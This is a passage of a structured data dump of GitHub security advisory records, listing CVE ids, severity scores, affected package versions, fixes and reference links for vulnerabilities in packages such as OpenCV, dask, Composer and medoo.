'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-ui-rails/CVE-2021-41182.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-contrib-2022-004'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-002'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:41Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}" +1.4.0,GHSA-5rg2-6qr5-2xp8,2021-10-25T20:08:18Z,2021-10-21T17:49:18Z,,['CVE-2021-3863'],Cross-site Scripting in snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3863'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/fc5efd857f61f7e45c61db567bb66612bcb53128'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/releases/tag/v5.3.0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1dbc8d79-1b53-44a3-a576-faec78f29ba0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:52:33Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}" +1.4.0,GHSA-jggw-2q6g-c3m6,2021-10-06T18:06:55Z,2021-10-12T22:22:58Z,,['CVE-2019-19624'],Out-of-bounds Read in OpenCV,"An out-of-bounds read was discovered in OpenCV before 4.1.1 (OpenCV-Python before 4.1.0.25). Specifically, variable coarsest_scale is assumed to be greater than or equal to finest_scale within the calc()/ocl_calc() functions in dis_flow.cpp. However, this is not true when dealing with small images, leading to an out-of-bounds read of the heap-allocated arrays Ux and Uy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19624'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/14554'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/commit/d1615ba11a93062b1429fce9f0f638d1572d3418'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2019-19624'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/25'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T18:06:55Z', 'nvd_published_at': '2019-12-06T15:15:00Z'}" +1.4.0,GHSA-j8fq-86c5-5v2r,2022-03-21T19:58:43Z,2021-10-27T18:53:48Z,,['CVE-2021-42343'],Remote code execution in dask,An issue was discovered in Dask (aka python-dask) through 2021.09.1. Single machine Dask clusters started with dask.distributed.LocalCluster or dask.distributed.Client (which defaults to using LocalCluster) would mistakenly configure their respective Dask workers to listen on external interfaces (typically with a randomly selected high port) rather than only on localhost. A Dask cluster created using this method (when running on a machine that has an applicable port exposed) could be used by a sophisticated attacker to achieve remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'distributed'}, 'ecosystem_specific': {'affected_functions': ['dask.distributed.LocalCluster', 'dask.distributed.Client']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2021.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dask/distributed/security/advisories/GHSA-hwqr-f3v9-hwxr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42343'}, {'type': 'WEB', 'url': 'https://github.com/dask/distributed/pull/5427'}, {'type': 'WEB', 'url': 'https://github.com/dask/distributed/commit/afce4be8e05fb180e50a9d9e38465f1a82295e1b'}, {'type': 'WEB', 'url': 'https://docs.dask.org/en/latest/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/dask/distributed'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-27T18:16:11Z', 'nvd_published_at': '2021-10-26T11:15:00Z'}" +1.4.0,GHSA-rqxg-xvcq-3v2f,2021-11-18T15:33:23Z,2021-10-12T22:02:04Z,,['CVE-2017-12605'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the FillColorRow8 function in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12605'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:53:47Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-m836-gxwq-j2pm,2021-10-27T18:58:30Z,2021-10-28T16:27:03Z,,[],Improper Access Control in github.com/treeverse/lakefs,"### Impact + +1. [medium] A user with write permissions to a portion of a repository may use the S3 gateway to copy any object in the repository if they know its name. +1. [medium] A user with permission to write any one of tags, branches, or commits on a repository may write all of them. +1. [low] A user with permission to read any one of tags, branches, or commits on a repository may read all of them. +1. [low] A user allowed to list objects in a repository _or_ read repository meta-data may retrieve graveler information about the location on underlying storage of all objects stored in any commit that they can view. If the user additionally has the capability to read underlying storage, they will be able to retrieve metadata associated with all objects in that commit. + +### For more information + +If you have any questions or comments about this advisory please: +* Email us at security@treeverse.io. +* Open an issue on https://github.com/treeverse/lakeFS/issues/new. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/treeverse/lakefs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.53.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/security/advisories/GHSA-m836-gxwq-j2pm'}, {'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/commit/f2117281cadb14fdf9ac7fe287f84d5c10308b88'}, {'type': 'PACKAGE', 'url': 'https://github.com/treeverse/lakeFS'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-27T18:58:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-4mvj-rq4v-2fxw,2022-12-03T03:56:39Z,2021-10-21T17:50:44Z,,['CVE-2021-23452'],Prototype Pollution in x-assign,This vulnerability affects all versions of package x-assign. The global proto object can be polluted using the __proto__ object.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'x-assign'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23452'}, {'type': 'PACKAGE', 'url': 'https://github.com/mvoorberg/x-assign'}, {'type': 'WEB', 'url': 'https://runkit.com/embed/sq8qjwemyn8t'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-XASSIGN-1759314'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T14:54:57Z', 'nvd_published_at': '2021-10-20T13:15:00Z'}" +1.4.0,GHSA-9cxh-gqpx-qc5m,2022-02-08T20:42:44Z,2021-10-12T17:49:25Z,,['CVE-2021-41355'],Credential Disclosure in System.DirectoryServices.Protocols,"Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. + +A Information Disclosure vulnerability exists in .NET where System.DirectoryServices.Protocols.LdapConnection may send credentials in plain text on Linux. + +### Patches +Any .NET application that uses `System.DirectoryServices.Protocols` with a vulnerable version listed below on system based on Linux. + +Package name | Vulnerable versions | Secure versions +------------ | ---------------- | ------------------------- +System.DirectoryServices.Protocols | 5.0.0 | 5.0.1 + +### Other Details + +- Announcement for this issue can be found at dotnet/announcements#202 +- An Issue for this can be found at https://github.com/dotnet/runtime/issues/60301 +- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.DirectoryServices.Protocols'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-9cxh-gqpx-qc5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/issues/60301'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:48:55Z', 'nvd_published_at': '2021-10-13T01:15:00Z'}" +1.4.0,GHSA-q9p4-qfc8-fvpp,2021-10-08T23:09:47Z,2021-10-12T16:32:38Z,,['CVE-2019-10762'],SQL Injection in medoo,columnQuote in medoo before 1.7.5 allows remote attackers to perform a SQL Injection due to improper escaping.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'catfan/medoo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10762'}, {'type': 'WEB', 'url': 'https://github.com/catfan/Medoo/commit/659864b393961bf224bba1efc03b7dcbed7de533'}, {'type': 'PACKAGE', 'url': 'https://github.com/catfan/Medoo'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-CATFANMEDOO-474562'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:09:47Z', 'nvd_published_at': '2019-10-30T22:15:00Z'}" +1.4.0,GHSA-9378-f4v7-jgm4,2021-10-08T21:29:34Z,2021-10-04T20:12:30Z,,['CVE-2021-41616'],Deserialization of Untrusted Data in org.apache.ddlutils:ddlutils,"Apache DB DdlUtils 1.0 included a BinaryObjectsHelper that was intended for use when migrating database data with a SQL data type of BINARY, VARBINARY, LONGVARBINARY, or BLOB between databases using the ddlutils features. The BinaryObjectsHelper class was insecure and used ObjectInputStream.readObject without validating that the input data was safe to deserialize. Please note that DdlUtils is no longer being actively developed. To address the insecurity of the BinaryObjectHelper class, the following changes to DdlUtils have been made: (1) BinaryObjectsHelper.java has been deleted from the DdlUtils source repository and the DdlUtils feature of propagating data of SQL binary types is therefore no longer present in DdlUtils; (2) The ddlutils-1.0 release has been removed from the Apache Release Distribution Infrastructure; (3) The DdlUtils web site has been updated to indicate that DdlUtils is now available only as source code, not as a packaged release.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ddlutils:ddlutils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41616'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ddlutils'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d7a8303a820144f5e2d1fd0b067e18d419421b58346b53b58d3fa72%40%3Cannounce.apache.org%3E'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T18:36:23Z', 'nvd_published_at': '2021-09-30T08:15:00Z'}" +1.4.0,GHSA-x3rm-644h-67m8,2021-10-06T20:21:31Z,2021-10-12T22:22:05Z,,['CVE-2019-16249'],Out-of-bounds Read in OpenCV,OpenCV 4.1.1 has an out-of-bounds read in hal_baseline::v_load in core/hal/intrin_sse.hpp when called from computeSSDMeanNorm in modules/video/src/dis_flow.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16249'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15481'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/15531'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1752702'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/30'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T20:21:31Z', 'nvd_published_at': '2019-09-11T23:15:00Z'}" +1.4.0,GHSA-frqg-7g38-6gcf,2021-10-11T18:39:06Z,2021-10-05T20:23:18Z,,['CVE-2021-41116'],Improper escaping of command arguments on Windows leading to command injection,"### Impact +Windows users running Composer to install untrusted dependencies are affected and should definitely upgrade for safety. Other OSs and WSL are not affected. + +### Patches +1.10.23 and 2.1.9 fix the issue + +### Workarounds +None +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'composer/composer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'composer/composer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '2.1.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/composer/composer/security/advisories/GHSA-frqg-7g38-6gcf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41116'}, {'type': 'WEB', 'url': 'https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/composer/composer'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:44:04Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}" +1.4.0,GHSA-5xvc-vgmp-jgc3,2021-10-29T13:44:43Z,2021-10-28T23:13:57Z,,['CVE-2021-41194'],Improper Access Control in jupyterhub-firstuseauthenticator,"### Impact + +When JupyterHub is used with FirstUseAuthenticator, the vulnerability allows unauthorized access to any user's account if `create_users=True` and the username is known or guessed. + +### Patches + +Upgrade to jupyterhub-firstuseauthenticator to 1.0, or apply patch https://github.com/jupyterhub/firstuseauthenticator/pull/38.patch + +### Workarounds + +If you cannot upgrade, there is no complete workaround, but it can be mitigated. + +If you cannot upgrade yet, you can disable user creation with `c.FirstUseAuthenticator.create_users = False`, which will only allow login with fully normalized usernames for already existing users prior to jupyterhub-firstuserauthenticator 1.0. If any users have never logged in with their normalized username (i.e. lowercase), they will still be vulnerable until you can patch or upgrade.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterhub-firstuseauthenticator'}, 'ecosystem_specific': {'affected_functions': ['firstuseauthenticator.firstuseauthenticator.FirstUseAuthenticator.authenticate']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/security/advisories/GHSA-5xvc-vgmp-jgc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41194'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38.patch'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38/commits/32b21898fb2b53b1a2e36270de6854ad70e9e9bf'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38/commits/9e200d974e0cb85d828a6afedb8ab90a37878f28'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/commit/953418e2450dbc2d854e332350849533b0ebc7ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/firstuseauthenticator'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T16:52:16Z', 'nvd_published_at': '2021-10-28T20:15:00Z'}" +1.4.0,GHSA-ppj4-34rq-v8j9,2023-08-30T00:32:37Z,2021-10-25T19:43:15Z,,['CVE-2021-42836'],github.com/tidwall/gjson Vulnerable to REDoS attack,GJSON is a Go package that provides a fast and simple way to get values from a json document. GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42836'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/236'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/237'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0265'}]","{'cwe_ids': ['CWE-1333', 'CWE-400', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:27:20Z', 'nvd_published_at': '2021-10-22T18:15:00Z'}" +1.4.0,GHSA-4cfr-gjfx-fj3x,2021-10-05T15:51:30Z,2021-10-05T17:53:11Z,,['CVE-2021-40324'],Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.,Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40324'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:51:30Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}" +1.4.0,GHSA-w7x8-cq7r-g5g9,2021-10-22T19:37:10Z,2021-10-25T19:43:39Z,,['CVE-2021-33988'],Cross Site Scripting in Microweber,"Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33988'}, {'type': 'WEB', 'url': 'https://github.com/nck0099/osTicket/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T19:37:10Z', 'nvd_published_at': '2021-10-19T17:15:00Z'}" +1.4.0,GHSA-wq8f-wvqp-xvvm,2021-11-18T15:34:09Z,2021-10-12T22:02:35Z,,['CVE-2017-12863'],Integer Overflow or Wraparound in OpenCV,"In opencv/modules/imgcodecs/src/grfmt_pxm.cpp, function PxMDecoder::readData has an integer overflow when calculate src_pitch. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding to OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12863'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9371'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:39:41Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}" +1.4.0,GHSA-fm39-cw8h-3p63,2021-10-07T15:12:30Z,2021-10-12T22:07:14Z,,['CVE-2019-14491'],Out-of-bounds Read in OpenCV,"An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 